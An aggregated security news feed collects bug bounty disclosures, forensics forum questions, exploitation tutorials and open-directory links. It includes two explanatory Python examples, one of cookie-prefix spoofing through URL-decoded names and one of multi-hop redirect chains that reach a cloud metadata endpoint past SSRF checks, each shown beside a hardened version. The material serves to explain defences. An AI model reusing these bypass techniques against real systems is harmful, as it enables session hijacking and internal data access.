    I am new to computer forensics and am having trouble installing autopsy to my Mac. When I am installing autopsy, I get an error when checking the prerequisites for autopsy. Specifically, when I type "sh unix_setup.sh" into terminal, it reads "ERROR: PhotoRec not found, please install the testdisk package." I have installed testdisk so I am just confused why I get this error. Sorry if this is a stupid question, I am just dumbfounded by this error message. submitted by /u/Vekayy [link] [comments]  ( 1 min )
  • Open

    Remote Code Execution on .8x8.com via .NET VSTATE Deserialization
    8x8 disclosed a bug submitted by 0daystolive: https://hackerone.com/reports/1391576
    text injection and content spoofing
    OneWeb disclosed a bug submitted by aman420: https://hackerone.com/reports/1353200
    Reflected Xss in https://world.engelvoelkers.com/...
    Engel & Völkers Technology GmbH disclosed a bug submitted by pl4gue_shell: https://hackerone.com/reports/1401209
    Ruby CVE-2021-41819: Cookie Prefix Spoofing in CGI::Cookie.parse
    Internet Bug Bounty disclosed a bug submitted by ooooooo_q: https://hackerone.com/reports/1464396 - Bounty: $2000
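    The class of bug behind the Ruby advisory (a cookie parser that URL-decodes cookie names, so a name the client sent as %5F%5FHost-… is read back as __Host-…), as an added Python example that is not the cgi gem's code and does not reproduce its parser: the decoding parser beside one that keeps names literal. SAMPLE_COOKIE_HEADER is a constructed request header; the cookie names and values are placeholders.

```python
from urllib.parse import unquote

# Name prefixes whose guarantees (Secure; for __Host- also host-only and
# Path=/) are enforced by the browser when the cookie is *set*. The server
# then trusts the literal name, so the name must never be transformed.
SECURITY_PREFIXES = ("__Host-", "__Secure-")

# Constructed Cookie request header: the first cookie was set legitimately;
# the second was planted by an attacker who could not satisfy the __Host-
# rules (e.g. from an insecure sibling subdomain) and so percent-encoded
# the underscores in the name instead.
SAMPLE_COOKIE_HEADER = "__Host-sid=legit; %5F%5FHost-sid=forged"


def _split_pairs(header: str):
    """Yield (name, value) pairs from a Cookie header, undecoded."""
    for part in header.split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            yield name, value


def parse_cookies_decoding_names(header: str) -> dict:
    """Vulnerable pattern: URL-decode the cookie *name* before use.
    "%5F%5FHost-sid" decodes to "__Host-sid" and, arriving later in the
    header, overwrites the genuine prefixed cookie."""
    cookies = {}
    for name, value in _split_pairs(header):
        cookies[unquote(name)] = unquote(value)
    return cookies


def parse_cookies(header: str) -> dict:
    """Hardened: keep the name exactly as the client sent it; decode only
    the value. The planted cookie is then merely a differently named one."""
    cookies = {}
    for name, value in _split_pairs(header):
        cookies[name] = unquote(value)
    return cookies


def trusted_prefixed_cookies(cookies: dict) -> dict:
    """Cookies whose literal name carries a security prefix; only these
    should be treated as having the prefix's guarantees."""
    return {n: v for n, v in cookies.items() if n.startswith(SECURITY_PREFIXES)}
```

    The check to add to any cookie-handling code is therefore on the name as transmitted: if a framework decodes names for convenience, prefix checks have to run on the raw name before that decoding happens.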
  • Open

    SecWiki News 2022-02-03 Review
    A new technique for bypassing app root detection by ourren. For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    Tuning in the Hot Spots
    A few months ago, I posted an instructional video on using internet radio servers to tune and listen to AM radio stations in Ukraine and… Continue reading on Medium »  ( 1 min )
    Quiztime — Random OSINT Challenge 10
    On Jan 20, 2022, Quiztime (contributor @trbrtc) shared a new OSINT quiz with us. The objective was, interesting. We had to figure out… Continue reading on Medium »  ( 2 min )
    Open-source Intelligence. With OSINT Course Giveaway !!
    Open-source Intelligence: Premium Hacking Course for Free !! Continue reading on Medium »  ( 2 min )
  • Open

    I’m bringing relaying back: A comprehensive guide on relaying anno 2022
    For years now, Internal Penetration Testing teams have been successful in obtaining a foothold or even compromising entire domains through a technique called NTLM relaying. The earliest, most descriptive relaying blog post I could find dates all the way back to 2017 written by Marcello, better known as byt3bl33d3r: https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html At the time of writing this... The post I’m bringing relaying back: A comprehensive guide on relaying anno 2022 appeared first on TrustedSec.  ( 15 min )
  • Open

    SnapFuzz: New fuzzing tool speeds up testing of network applications
    Article URL: https://portswigger.net/daily-swig/snapfuzz-new-fuzzing-tool-speeds-up-testing-of-network-applications Comments URL: https://news.ycombinator.com/item?id=30191854 Points: 17 # Comments: 2  ( 4 min )
    Fuzzing Java to Find Log4j Vulnerability – CVE-2021-45046
    Article URL: https://www.youtube.com/watch?v=kvREvOvSWt4 Comments URL: https://news.ycombinator.com/item?id=30190779 Points: 1 # Comments: 0
  • Open

    Exposing FBI's Most Wanted Cybercriminal Mujtaba Raza from Forwarderz and SecondEye Solution - An OSINT Analysis - Maltego Technical Details Video Demonstration
    Google is your best friend! Here's the original analysis. Check out the actual Maltego technical details video demonstration here: Enjoy!
  • Open

    What is Red Teaming?
    This blog post was published on PurpleBox website on Feb 2nd, 2022. Continue reading on PurpleBox »  ( 6 min )
  • Open

    Learning V8 Exploitation from Scratch: starctf 2019 OOB (Part 3)
    Author: Hcamael@Knownsec 404 Team. Related reading: Learning V8 Exploitation from Scratch: Environment Setup (Part 1); Learning V8 Exploitation from Scratch: A Generic V8 Exploit Chain (Part 2). I got started with a starctf 2019 challenge called OOB, so let me talk about that challenge first. There is an article on FreeBuf, "Learning V8 Exploitation from Scratch with a CTF Challenge" (《从一道CTF题零基础学V8漏洞利用》), which I found quite beginner-friendly; it is the article I used to get started with V8 exploitation. Environment setup $ git...
  • Open

    Debian has not fixed CVE-2021-44142
    Article URL: https://security-tracker.debian.org/tracker/CVE-2021-44142 Comments URL: https://news.ycombinator.com/item?id=30183811 Points: 2 # Comments: 1
  • Open

    WooCommerce Skimmer Uses Fake Fonts and Favicon to Steal CC Details
    The holidays are always a busy time for ecommerce stores. Dealing with an influx of Christmas shoppers, holiday sales and inventory, shipping, and at times, also hackers. Today’s investigation starts out much like many others, with our client reporting an antivirus warning appearing only on their checkout page, of course at the worst possible time right around the end of December. What first seemed to be a routine case of credit card theft turned out to be a much more interesting infection that leveraged font, favicon and other less commonly used files to pilfer credit card details. Continue reading WooCommerce Skimmer Uses Fake Fonts and Favicon to Steal CC Details at Sucuri Blog.
  • Open

    Entry-level Penetration Tester salary in Switzerland?
    What would be an approximate salary range for a penetration tester in Switzerland (Zürich area as a reference)? Not necessary big 4 but also small or medium size companies, for an entry level position, with a master's degree, and a 6-month internship in the field as the only experience. submitted by /u/BroX111 [link] [comments]  ( 1 min )
    How would you fix today's computer security problems?
    UPDATE: My original question was too broad. Please choose which significant problem you might solve based on your expertise. No silver bullet to solve all security problems is necessary. Thanks for your constructive criticism! How would you fix today's computer security problems if you could start any hardware or software company, or create any technology-related standard? It could be anything, maybe new hardware and software working together that fixes a major problem like hacking or malware. I don't want to put anyone in a creative box so I'll share my idea later today. Please don't read any results until you have thought of something. Update: How would you protect as many people as possible when you run or control a company like Google, Microsoft, Intel, etc., or can pass new laws or create new tech standards? submitted by /u/greyyit [link] [comments]  ( 5 min )
    EDR / XDR on premise
    Hi, does anyone know of useful EDR products which could be operated on premise, without using cloud services? Could also just be a so-called next-gen AV at least? Maybe you could even share some experience? All products I know are cloud based and report too much to the cloud (e.g. file paths, user information etc). I've read of Cybereason once, but the link to the on-prem offer is invalid... Bitdefender advertises an EDR on prem, but I only know them from a consumer perspective. Thanks! submitted by /u/winschdi [link] [comments]  ( 2 min )
    Scanning for locations.
    Hello, any tips on scanning slower with gobuster or another tool for finding paths and evading a WAF? I'm afraid it will be detected and probably my machine will be blocked by it. submitted by /u/tryingtoworkatm [link] [comments]  ( 1 min )
    How Are Hackers Caught
    If tools like proxies are available to hackers, how are they caught? submitted by /u/Odd_Rip6706 [link] [comments]  ( 4 min )
    Advice deciding between 2 cybersecurity offers at the Big4
    Hey guys, I recently received cybersecurity consultant offers from both KPMG and EY. While I do have a lot of info about each firm based on my interviews and offer letters, I was wondering if there were any former/current employees or anybody here who has worked with these two firms, and if they could share about their experiences? Compensation-wise, EY's is higher. They're both in the same city on the West Coast. Thanks! submitted by /u/bongotw [link] [comments]  ( 2 min )
    Question regarding a CTI event that can lead to an incident
    Hi user, I have a question regarding threat intelligence and "incident" response. Let's take an example: I work for Company A. I notice that an access broker sells access to Company B. Company A and Company B work together and have some network connection to exchange data. In this case, we can suppose that Company B will increase our threat risk due to possible lateral movement, but as the threat actor "only" sells an access, we can't determine what kind of threat we will be facing. On the business side it will be hard for them to understand that it's a potential threat and that we should execute a containment phase by cutting the connection with Company B. And for the detection team, we don't have enough info on what kind of threat they should monitor. In your opinion, what should I do? submitted by /u/octave_ [link] [comments]  ( 2 min )
  • Open

    Using Power Automate for Covert Data Exfiltration in Microsoft 365
    submitted by /u/rsobers [link] [comments]
    Hacking Google Drive Integrations
    submitted by /u/albinowax [link] [comments]
  • Open

    The evolution of a Mac trojan: UpdateAgent’s progression
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    Walkthrough — Hacktoria: Geolocation 06
    As I’m having so much fun doing the Hacktoria’s geolocation challenges, I have decided to just keep solving them and writing walkthroughs… Continue reading on Medium »  ( 3 min )
    Quiztime — Random OSINT Challenge 8
    On Jan 16, 2022, Quiztime (contributor @trbrtc) shared a new OSINT quiz with us. The objective was simple but cool. We had to figure out… Continue reading on Medium »  ( 3 min )
  • Open

    Vulnerability Capstone — Tryhackme
    Vulnerability Researching  ( 2 min )
    CTF Write-Up: Rain
    CTF Write-Up: Rain  ( 3 min )
    Multiple HTTP Redirects to Bypass SSRF Protections
    Always try more than one HTTP 302 redirects when testing for SSRF  ( 4 min )
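    The point of the "more than one redirect" tip, as an added example that is not part of the linked write-up: a fetcher that validates the user-supplied URL and the first Location header, then follows the rest blindly, can still be walked hop by hop to a link-local metadata endpoint, while a fetcher that never auto-follows and re-validates every hop stops the chain. FAKE_DNS and FAKE_HTTP are constructed stand-ins for name resolution and HTTP so the code runs offline; the hostnames, addresses and paths are placeholders.

```python
import ipaddress
from urllib.parse import urlparse

REDIRECT_STATUSES = (301, 302, 303, 307, 308)
MAX_HOPS = 5

# Constructed DNS table: the attacker host resolves to an ordinary public
# address, the "metadata" name to the cloud metadata link-local address.
FAKE_DNS = {
    "attacker.example": "1.2.3.4",
    "metadata.internal": "169.254.169.254",
}

# Constructed HTTP responses: url -> (status, Location header or None, body).
# The chain starts on a public host and only turns internal on the 2nd hop.
FAKE_HTTP = {
    "https://attacker.example/start": (302, "https://attacker.example/hop2", ""),
    "https://attacker.example/hop2": (302, "http://metadata.internal/latest/meta-data/", ""),
    "http://metadata.internal/latest/meta-data/": (200, None, "ami-id\ninstance-id\n"),
    "https://attacker.example/image.png": (200, None, "PNG..."),
}


def is_public_url(url: str) -> bool:
    """Resolve the host and accept only globally routable, non-link-local IPs."""
    p = urlparse(url)
    if p.scheme not in ("http", "https") or not p.hostname:
        return False
    ip_str = FAKE_DNS.get(p.hostname)
    if ip_str is None:
        return False
    ip = ipaddress.ip_address(ip_str)
    return ip.is_global and not ip.is_link_local


def fake_get(url: str):
    """Stand-in for an HTTP GET that does *not* follow redirects itself."""
    return FAKE_HTTP.get(url, (404, None, ""))


def naive_fetch(url: str):
    """Weak defence: validate the submitted URL and the first redirect target,
    then follow any further redirects without checking them."""
    if not is_public_url(url):
        raise ValueError("blocked")
    status, location, body = fake_get(url)
    if status in REDIRECT_STATUSES and location:
        if not is_public_url(location):
            raise ValueError("blocked")
        url = location
        for _ in range(MAX_HOPS):  # remaining hops are trusted blindly
            status, location, body = fake_get(url)
            if status not in REDIRECT_STATUSES or not location:
                break
            url = location
    return url, body


def safe_fetch(url: str):
    """Hardened: never auto-follow; validate every hop and cap the chain."""
    for _ in range(MAX_HOPS + 1):
        if not is_public_url(url):
            raise ValueError(f"blocked: {url}")
        status, location, body = fake_get(url)
        if status in REDIRECT_STATUSES and location:
            url = location
            continue
        return url, body
    raise ValueError("too many redirects")
```

    The per-hop check is necessary but not sufficient: the client must also connect to the address it validated rather than resolving the name a second time, since a host that answers differently on the next lookup (DNS rebinding) is a separate bypass that hop validation alone does not close.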
    How I Made +$16,500 Hacking CDN Caching Servers — Part 3
    @bxmbn  ( 2 min )
    How I Made +$16,500 Hacking CDN Caching Servers — Part 2
    @bxmbn  ( 2 min )
    How I Made $16,500+ By Hacking Caching Servers — Part 1
    @bxmbn  ( 2 min )
    Data exfiltration using XXE on a hardened server
    Blind XXE exploitation using the error-based method.  ( 4 min )
    Day 20, Web Reconnaissance Or Information Gathering — Part 5#100DaysofHacking
    Get all the writeups from Day 1 to 19, Click Here Or Click Here.  ( 3 min )
    How I Hacked Kerala Road Transport Corporation(KSRTC)?
    Hello Hackers!! My name is Krishnadev P Melevila, a 19-Year-Old Self-learned cybersecurity enthusiast and web application penetration…  ( 2 min )
  • Open

    Serious Vulnerability in WordPress Plugin Essential Addons for Elementor
    Article URL: https://portswigger.net/daily-swig/serious-vulnerability-in-wordpress-plugin-essential-addons-for-elementor-eliminated Comments URL: https://news.ycombinator.com/item?id=30179610 Points: 2 # Comments: 1  ( 3 min )
    Critical Vulnerability in WordPress Plugin Essential Addons for Elementor
    Article URL: https://portswigger.net/daily-swig/critical-vulnerability-in-wordpress-plugin-essential-addons-for-elementor Comments URL: https://news.ycombinator.com/item?id=30179238 Points: 1 # Comments: 0  ( 3 min )
    Fastly patches memory leak HTTP/3 vulnerability in H2O HTTP server project
    Article URL: https://portswigger.net/daily-swig/fastly-patches-memory-leak-http-3-vulnerability-in-h2o-http-server-project Comments URL: https://news.ycombinator.com/item?id=30177816 Points: 3 # Comments: 0  ( 3 min )
  • Open

    SecWiki News 2022-02-02 Review
    Security Academic Circle 2021 annual summary by ourren; 2021 year-end summary: my growth in the Tsinghua Apache IoTDB group by ourren. For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    Common authentication and authorization vulnerabilities (and how to avoid them)
    Authentication and authorization are two cornerstones of modern web application security, but there are many ways to get them wrong. Learn how to identify common security defects and avoid vulnerabilities that could allow attackers to access restricted data and functionality by bypassing authentication, authorization, or both. READ MORE  ( 6 min )
  • Open

    Notional Double Counting Free Collateral Bugfix Review
    Summary Continue reading on Immunefi »  ( 5 min )
    My first bounty, IDOR + Self XSS [€3000]
    Every hacker would have come across this, the first bounty. I can’t actually explain how it feels but I know that most of you can… Continue reading on Medium »  ( 5 min )
    How To Spice Up Your Programming Journey With 5 Hacks.
    If you are a beginning programmer like me as much as you love programming, there will be times when you feel down. This is not you been… Continue reading on Medium »  ( 2 min )
  • Open

    Utility components and the sx prop in Material-UI
    The Box utility component renders as a div element and lets you apply the shorthand syntax for writing CSS styles… Continue reading on Medium »  ( 1 min )
  • Open

    Index pages from 973-eht-namuh-973
    https://www.973-eht-namuh-973.com/search-pages/ https://www.973-eht-namuh-973.com/coloured%20site/ https://www.973-eht-namuh-973.com/Black%20and%20White/ https://www.973-eht-namuh-973.com/images/ https://www.973-eht-namuh-973.com/rotators/ https://www.973-eht-namuh-973.com/Alchemy/ https://www.973-eht-namuh-973.com/Magick/ Let me know if there’s others I missed. submitted by /u/EmuAnon34 [link] [comments]  ( 1 min )
    Animated movies (sorry if repost)
    submitted by /u/lostsquanderer [link] [comments]
    Large folder of videos pertaining to game design
    http://mirror.reenigne.net/gdc/ submitted by /u/inoculatemedia [link] [comments]
    Old gramophone records
    http://oldgramophonerecords.co.uk/4y1/ submitted by /u/inoculatemedia [link] [comments]  ( 1 min )
  • Open

    Multiple vulnerability leading to account takeover in TikTok SMB subdomain.
    TikTok disclosed a bug submitted by lu3ky-13: https://hackerone.com/reports/1404612 - Bounty: $999
  • Open

    Recycle bin conundrum
    Have a read-only external USB device with a copy of an imaged recycle bin. Goal is to pass off the USB to an attorney for review of recycle bin $R files. WIN10 forensic laptop (A) recycle bin is empty, no software running. When plugged into the forensic laptop, I can navigate via File Explorer to the recycle bin folders and files. I can open the $R files and the SID of user for 2 user accounts. I properly eject the USB and connect it to another laptop (B) before passing off to the attorney. Laptop (B) is my day-to-day use laptop. The recycle bin on laptop (B) is empty. Laptop (B) is a WIN10 machine. When I plug the USB into laptop (B) and navigate to the recycle bin files, no SIDs, instead recycle bin icons. When I click on the recycle bin icons, no contents. Any ideas on how to resolve this? submitted by /u/ATXChimera [link] [comments]  ( 1 min )
  • Open

    Learning V8 Exploitation from Scratch: A Generic V8 Exploit Chain (Part 2)
    Author: Hcamael@Knownsec 404 Team. Related reading: Learning V8 Exploitation from Scratch: Environment Setup (Part 1). After a period of research, here is a first round of summary; since I have only been at this for a short while, it may have some limitations, and I will correct them later if I find any. Overview: I believe you have to set a clear goal before doing any exploitation. For example, in CTF binary challenges the goal is, in most cases, to execute system(/bin/sh) or execve(/bin/sh,0,0). In V8 exploitation...
  • Open

    Newbie investigating hdd
    Hello there, I recently acquired some used HDDs to try forensics as a student in cyber security. I'm using Kali Linux in forensic mode. I have a few questions: 1) Can using fdisk -l or parted -l modify data on the HDD? (both launched as root) What about gparted? (if not touching anything, of course) 2) Working as root, is chmod a-w /dev/sde (the drive "location") really useful, like will it really prevent any write even from root? 3) Created an image with dcfldd, asked for a sha1 checksum, and before imaging used sha1sum on /dev/sde. They match. Does anyone work another way? 4) Tried to import the image into Autopsy with different settings but no file or anything else was found. Then successfully linked it to /dev/loop1 using losetup, but could not mount the "partition" (no filesystem nor partition is detected with parted -l, but gparted tells me sde is an ataraid partition). Had some error like "unknown filesystem type 'ddf_raid_member'", so after a bit of digging tried some stuff with mdadm, but it did not work. Any idea? submitted by /u/ner00n [link] [comments]  ( 2 min )
    Creating an EnCase Image of a MacBook Pro Max (A2485)
    Hi everyone, I want to create an EnCase image from a MacBook (Model A2485, M1 Max) but all of my attempts so far have failed. The password is known and I have physical access to the device. I have already tried the following: - boot an external USB with Paladin Edge -> failed to boot from it (tried to allow booting from external sources via recovery, but there was no option for enabling it) - put the MacBook into target disk mode and connected it to another iMac -> tried to create an image via ewfacquire but the shared disk wasn't an extra device (or I failed to see it) - boot an external USB with Paladin Edge on another iMac, put the MacBook into target disk mode and connected it to the iMac -> Paladin Edge doesn't recognize the shared disk My last idea is just to do a Time Machine backup from the MacBook to a clean / wiped HDD and create an EnCase image from it ... Does someone have any other ideas? Would be very happy about any suggestions! Thanks in advance! submitted by /u/frcGuy81 [link] [comments]  ( 2 min )
  • Open

    Inside Trickbot, Russia’s Notorious Ransomware Gang
    submitted by /u/CyberMasterV [link] [comments]
    New Hybrid Campaign OiVaVoii Uses Malicious OAuth Apps | Cyware Hacker News
    submitted by /u/ITlocknkey [link] [comments]
    Using PwnKit-Hunter to check for CVE-2021-4034 Vulnerable Systems
    submitted by /u/jat0369 [link] [comments]
    Remote root vulnerability for Samba (CVE 2021-44142)
    submitted by /u/lormayna [link] [comments]  ( 1 min )
  • Open

    Twitter stores original account names, dox vulnerability via Twitter Spaces
    Article URL: https://twitter.com/tszzl/status/1488466979799265281 Comments URL: https://news.ycombinator.com/item?id=30169435 Points: 31 # Comments: 1  ( 1 min )
    Arbitrary code execution vulnerability in Samba
    Article URL: https://www.samba.org/samba/security/CVE-2021-44142.html Comments URL: https://news.ycombinator.com/item?id=30166148 Points: 3 # Comments: 0  ( 1 min )
    High severity vulnerability in Element Desktop 1.9.6 and earlier
    Article URL: https://matrix.org/blog/2022/01/31/high-severity-vulnerability-in-element-desktop-1-9-6-and-earlier/ Comments URL: https://news.ycombinator.com/item?id=30163784 Points: 1 # Comments: 0  ( 1 min )
  • Open

    SQL injection at /admin.php?/cp/members/create
    ExpressionEngine disclosed a bug submitted by khoabda1: https://hackerone.com/reports/968240
    Information disclosure-Referer leak
    Brave Software disclosed a bug submitted by kkarfalcon: https://hackerone.com/reports/1337624 - Bounty: $500
    The Return of the Grinch
    h1-ctf disclosed a bug submitted by w31rd0: https://hackerone.com/reports/1433581 - Bounty: $1000
    Saving Christmas from Grinchy Gods
    h1-ctf disclosed a bug submitted by akshansh: https://hackerone.com/reports/1434017 - Bounty: $1000
    Full Response SSRF via Google Drive
    Dropbox disclosed a bug submitted by bugdiscloseguys: https://hackerone.com/reports/1406938 - Bounty: $17576
    Reflected Xss On https://vk.com/search
    VK.com disclosed a bug submitted by b4walid: https://hackerone.com/reports/1454359 - Bounty: $500
  • Open

    [Question] How are these directories discovered? Is it random web-surfing then sharing? Or do some of you use crawlers?
    Basically says it all in the title! I just found this sub-reddit, VERY COOL! I am a /r/datahoarder and I appreciate this sort of thing! I am just curious as to how these open directories are discovered. Thanks all for being a part of this community! submitted by /u/cs_legend_93 [link] [comments]  ( 1 min )
    Does anyone have OD-Shots uploaded in 2019 and 2020?
    I'm looking for .xlsx files that were posted in 2019/2020 on this sub, because the links that were uploaded are now dead. Has anyone saved them and can upload them once again? Again, I'm not looking for the last upload but files that were shared earlier. submitted by /u/GingrFattyJesusFreak [link] [comments]  ( 1 min )
    Filechef not working???
    Does anyone know if https://www.filechef.com/ is down??? submitted by /u/klutz50 [link] [comments]
    photos and documents relating to Russian involvement in Ukraine
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    high res images of Russian dairy products
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
  • Open

    No Rate Limiting on OTP sending
    Firstly I would like to say that this is my first ever writeup for the InfoSec community and I may not be so good at presenting the… Continue reading on Medium »  ( 2 min )
    Theoretical Bugs With No Impact Don’t Get Paid — Here’s Why
    As a whitehat, it’s easy to want to submit as many bugs as possible to a project — especially projects on Immunefi, because the bounties… Continue reading on Immunefi »  ( 2 min )
    H1-CTF Hacky Holidays Writeup
    Hey everyone, I hope you all are fine and doing good. In December HackerOne made a 12-day, 12-level CTF called Hacky-Holidays which had 12… Continue reading on Medium »  ( 8 min )
    My experience of Hacking The Dutch Government
    Hi Everyone! , Continue reading on Medium »  ( 2 min )
    OSINT Tips for Penetration Testing
    In this article, we will discuss some of my favorite OSINT techniques that can help during your penetration testing activities. Continue reading on Medium »  ( 1 min )
    Check Out the Speakers for IWCON 2022
    Register today to be a part of the coolest Cybersecurity conference of 2022! Continue reading on InfoSec Write-ups »  ( 2 min )
    Password Spraying Attack
    Hello everyone! 🎉 Continue reading on Medium »  ( 1 min )
    A Peculiar Case of XSS and my first bug
    Hello everyone, I am new to security stuff and will share how I was able to get few XSS in not so common way. Continue reading on Medium »  ( 1 min )
    IDOR vulnerability on invoice and weak password reset leads to account take over
    This year I started doing bug bounties and I only got a valid P5 report, and my reports for P4 and P3 got rejected. Continue reading on Medium »  ( 3 min )
    Understanding Automation in Bug Bounty
    ==UNDER CONSTRUCTI Continue reading on Medium »  ( 1 min )
    Beginner Bug Bounty Guide - Part 5
    Continue reading on Medium »
  • Open

    Question on using VMware pro and Nessus, isolating one VM from communication with internet.
    I need help running a vuln scan using VMware Workstation Pro and Nessus :/ Looking for advice/help on vuln. scanning using VMware Workstation Pro and Nessus. Hey folks!!! I am looking to run Nessus on one VM, and run the vulnerability scan on a second VM. My constraints are that the VM running Nessus should be able to access/communicate out to the internet, while the VM being scanned should not be able to communicate with the internet; it should only be able to communicate with the VM performing the Nessus scan. I tried setting up both VMs on a host-only VMnet, but Nessus was not able to get or use certain plugins that way. I'm looking for any help or advice setting this up as I described, as I have not been successful. Thanks in advance for any help! submitted by /u/enki0817 [link] [comments]  ( 1 min )
    IRM/document encryption... Why isn't it used more?
    I'm a MS:CS student taking some cybersecurity classes. We learned about IRM, basically symmetrically encrypted documents with the keys managed by a central server backed via AD or whatever the org uses for AAA. It sounds pretty useful for dealing with vendors and helping deter exfiltration (and as a bonus, leaked docs encrypted at rest can't easily be used to extort ransoms), but it doesn't sound like very many places use it. Are the downsides of cost, difficulty of use for the the user, and vendor lock-in a deal breaker for a lot of enterprises? Is the prevailing view that since someone can still take pictures of the screen with their phone, it's not worth the effort? Or that this kind of threat isn't considered to be very serious? What other real world issues am I not considering? Cheers submitted by /u/berrmal64 [link] [comments]  ( 4 min )
    Help me guys
    I have downloaded 2 photo recovery apps from the Play Store onto my phone. But I am scared that they might be fake apps which steal photos. I have checked the privacy policy, in which it was stated that "The information that I request will be retained on your device and is not collected by me in any way." But now I'm not sure whether I can trust them. The apps seem to be fake with manipulated reviews. Where would all my photos go if they are sus apps? Do you guys think that they are sus apps by high chances? It would be nice if I get replies... Thank you! submitted by /u/WhiteSwordMaster [link] [comments]  ( 1 min )
    Has my NVR been hacked?
    Was just looking at my IDS alerts on my pfSense router and noticed the following entries seen in the screenshot here https://imgur.com/a/AMfpMaH. I've done a whois on some of the source IP addresses and they're questionable, to say the least. The device in question is a Hikvision NVR. My main concern is, has my NVR been hacked and turned into a TOR relay/exit node? Is there anything I can do to test this? I also want to point out that I don't have any ports opened facing the internet for this NVR which is also a bit weird as I thought that would offer me more protection! TIA submitted by /u/Bosshogg226 [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-02-01 Review
    No news updated today. For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    Solidity Audit & Ethereum Smart Contract Analysis using Mythril - Blockchain Security #2
    submitted by /u/pat_ventuzelo [link] [comments]
  • Open

    Check Out the Speakers for IWCON 2022
    Register today to be a part of the coolest Cybersecurity conference of 2022!  ( 2 min )
    Hack a Linux Desktop with The Cheapest USB Rubber Ducky and The Android Terminal (Termux)
    Last time, I wrote an article about making a USB Rubber Ducky for less than $3, and I did a simple test and attached how to…  ( 3 min )
    How I exposed the teacher’s Aadhaar card, bank details on the college website.
    Hey fellow hackers and Bug hunters,  ( 2 min )
    Understanding Steganography for Capture The Flag Challenges
    What is Steganography? Where is it used? Steganography in CTFs  ( 3 min )
    Paytm-Broken Link Hijacking
    Hello Everyone….  ( 3 min )
    TryHackMe — Extending Your Network
    Ctf info writeup  ( 4 min )
    Everyday-Cyber
    Day-1  ( 4 min )
    The Story of an RCE on a Java Web Application
    It was about two months ago (November 2021) I was invited to a private program. According to their program scope, I decided to hack them…  ( 5 min )
    Exposing the "InFraud Organization" - An OSINT Analysis - Maltego Technical Details Video Demonstration
    Amazing! Feel like it's 2007 -- check out the slides here, including the technical details, which I produced for https://whoisxmlapi.com, including the following Maltego technical details video demonstration: Enjoy!
    Domain Escalation – Machine Accounts
    The pass the hash technique is not new and it was usually used for lateral movement on the network in scenarios where the administrator password… Continue reading → Domain Escalation – Machine Accounts  ( 3 min )
    RCE in Samba (CVE-2021-44142)
    Article URL: https://www.samba.org/samba/security/CVE-2021-44142.html Comments URL: https://news.ycombinator.com/item?id=30158662 Points: 3 # Comments: 0  ( 1 min )
    Learning V8 Exploitation from Scratch: Environment Setup (Part 1)
    Author: Hcamael@知道创宇404实验室. For certain reasons I recently started learning V8 exploitation, so I plan to write a series of articles to record my learning process. Overview: Before starting to research V8 you obviously need an environment with the matching version, and there are plenty of tutorials online for setting up a V8 environment. When building the environment in China, for well-known reasons, we hit the first bottleneck: the network. That is easy enough to solve by building the environment on a VPS, which gives the fastest network speed. But then comes the second bottleneck, performance: a personal VPS usually has 1...
    Beginner Bug Bounty Guide - Part 5
    Previous : Beginner Bug Bounty Guide — Part 4 Continue reading on Medium »  ( 1 min )
    TheHuzz: Instruction Fuzzing of Processors Using Golden-Reference Models
    Article URL: https://arxiv.org/abs/2201.09941 Comments URL: https://news.ycombinator.com/item?id=30156948 Points: 1 # Comments: 0  ( 2 min )

    Analyzing Malware with Hooks, Stomps and Return-addresses
    submitted by /u/jat0369 [link] [comments]
    Don't trust comments
    submitted by /u/crower [link] [comments]
    RCE and Auth Bypass in Aqua Illumination Hydra Series Aquarium Lights
    submitted by /u/laransec [link] [comments]
    Reverse Engineering 3201: Symbolic Analysis
    submitted by /u/OpenSecurityTraining [link] [comments]
    A story of leaking uninitialized memory from Fastly
    submitted by /u/albinowax [link] [comments]  ( 1 min )
    TrendNET AC2600 RCE from the Internet
    submitted by /u/dinobyt3s [link] [comments]
    Top Ways Websites get Hacked by Spammers
    There’s a lot that goes into a website environment in terms of functionality. Due to this, it’s only natural that one of the most commonly asked questions is how websites are usually hacked. In my previous post I talk about the Most Interesting Vulnerabilities of 2021, which should provide more insight into the more recent hacks seen, or caught beforehand. In this article we’ll be discussing the primary ways websites are infected, and how you can better prevent it from happening.  Continue reading Top Ways Websites get Hacked by Spammers at Sucuri Blog.
    Lots of movies, TV shows, and top shelf porn
    192.64.86.228 submitted by /u/inoculatemedia [link] [comments]
    Movies, Documentaries, music, TV Series etc
    Quite a handful of TV Shows, Movies, Documentaries etc. Some content may be NSFW. http://188.165.227.112/portail/ submitted by /u/amritajaatak [link] [comments]  ( 1 min )
    Cyber Investigator OSINT CTF “Crime Scene Investigation” Writeup
    The Cyber Society at Cardiff University runs the Cyber Investigator CTF, a free CTF with OSINT, forensics, and investigation challenges. Continue reading on Medium »  ( 5 min )
    Walkthrough — Hacktoria: Geolocation 02
    After having so much fun solving Hacktoria’s Geolocation — 01 challenge yesterday, I have decided today to go for the 2nd challenge. Here… Continue reading on Medium »  ( 5 min )
    Quiztime — Random OSINT Challenge 7
    On Jan 12, 2022, Quiztime (contributor @twone2) shared a new OSINT quiz with us. The objective was simple. We had to figure out where and… Continue reading on Medium »  ( 1 min )
    What is OSINT?(Part 1): A practical introduction!
    This article was written in collaboration with the marvelous Aardwarewolf Continue reading on Medium »  ( 17 min )
    What is OSINT? (Part 1)
    A practical introduction Continue reading on Medium »  ( 16 min )
    Investigating Russian Number Plates
    Russian number plates come in a variety of shapes and sizes and can reveal interesting information regarding the owner of a target vehicle… Continue reading on Medium »  ( 3 min )
    Multiple firewall layers - are they necessary?
